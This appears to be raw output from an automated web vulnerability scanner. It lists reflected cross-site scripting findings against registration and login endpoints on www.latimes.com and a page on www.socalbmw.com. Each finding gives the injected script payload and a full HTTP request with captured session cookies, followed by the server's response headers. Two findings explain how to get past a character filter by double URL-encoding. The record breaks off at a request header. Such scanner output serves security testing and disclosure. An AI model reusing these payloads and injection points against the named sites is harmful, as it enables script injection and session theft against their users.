Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s29z1n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101314

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20bbe"><script>alert(1)</script>3f2af118913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site/registration20bbe"><script>alert(1)</script>3f2af118913/logout.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s29z2n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d98f0"><script>alert(1)</script>d3564563da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicesd98f0"><script>alert(1)</script>d3564563da1/site/registration/show-createprofile.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s28z1n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101475

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ce5"><script>alert(1)</script>1a2d36366e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site29ce5"><script>alert(1)</script>1a2d36366e1/registration/show-createprofile.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s28z2n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101475

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb866"><script>alert(1)</script>0374a69d91e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site/registrationfb866"><script>alert(1)</script>0374a69d91e/show-createprofile.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s27z2n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5af2"><script>alert(1)</script>fd602a293bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicesd5af2"><script>alert(1)</script>fd602a293bd/site/registration/show-login.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s29z1n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de95b"><script>alert(1)</script>66003bbb14c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/sitede95b"><script>alert(1)</script>66003bbb14c/registration/show-login.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s27z1n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101297

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18fd0"><script>alert(1)</script>facb52be5ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site/registration18fd0"><script>alert(1)</script>facb52be5ee/show-login.register HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html
X-Instance-Name: i6s27z2n1
Content-Location: /signon/login-landing.jsp
Expires: Sun, 12 Dec 2010 18:55:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 18:55:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a68df%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebb6ab4d2f was submitted in the REST URL parameter 2. This input was echoed as a68df<script>alert(1)</script>4ebb6ab4d2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Finance/financeoffers.aspxa68df%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebb6ab4d2f HTTP/1.1
Host: www.socalbmw.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 18:45:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=csp02w55on2d2x55hug3bf45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87cba%253cscript%253ealert%25281%2529%253c%252fscript%253ebd3336606aa was submitted in the REST URL parameter 1. This input was echoed as 87cba<script>alert(1)</script>bd3336606aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
